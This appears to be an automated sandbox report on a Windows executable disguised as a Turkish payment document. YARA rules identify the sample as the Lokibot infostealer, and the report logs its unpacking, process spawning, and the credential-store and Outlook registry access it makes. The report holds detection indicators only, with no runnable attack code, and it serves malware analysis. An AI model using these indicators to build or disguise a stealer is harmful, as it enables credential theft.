Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6E1E38	0_2_0A6E1E38
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6E8458	0_2_0A6E8458
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6EB530	0_2_0A6EB530
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 1_2_0040549C	1_2_0040549C
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 1_2_004029D4	1_2_004029D4

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 80

Source: Odeme_belgesi.exe, 00000000.00000002.1680393686.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Odeme_belgesi.exe
Source: Odeme_belgesi.exe, 00000000.00000002.1692289357.000000000DBBA000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameserver1.exe: vs Odeme_belgesi.exe
Source: Odeme_belgesi.exe, 00000000.00000000.1665120062.0000000000632000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameserver1.exe: vs Odeme_belgesi.exe
Source: Odeme_belgesi.exe	Binary or memory string: OriginalFilenameserver1.exe: vs Odeme_belgesi.exe

Source: Odeme_belgesi.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Odeme_belgesi.exe PID: 6912, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Odeme_belgesi.exe PID: 7124, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: Odeme_belgesi.exe

Static PE information: Section: pNld"O ZLIB complexity 1.0003274877265862

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/3@3/1

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Code function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

1_2_0040650A

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Code function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

1_2_0040434D

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Odeme_belgesi.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7128

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\fe982138-f3da-4d31-99ef-675c1f388bd3

Jump to behavior

Source: Odeme_belgesi.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Odeme_belgesi.exe

ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\Odeme_belgesi.exe "C:\Users\user\Desktop\Odeme_belgesi.exe"
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exe
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exe
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 80
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exe	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exe	Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Odeme_belgesi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Odeme_belgesi.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Unpacked PE file: 0.2.Odeme_belgesi.exe.5d0000.0.unpack pNld"O:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Odeme_belgesi.exe PID: 6912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Odeme_belgesi.exe PID: 7124, type: MEMORYSTR

Source: Odeme_belgesi.exe	Static PE information: section name: pNld"O
Source: Odeme_belgesi.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6E2AF0 pushad ; ret	0_2_0A6E2AF1
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6E9BBF push 8BFFFFFFh; retf	0_2_0A6E9BC5
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6E31D0 pushad ; retf	0_2_0A6E31D1
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AD4
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AFC

Source: Odeme_belgesi.exe

Static PE information: section name: pNld"O entropy: 7.999478956820455

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
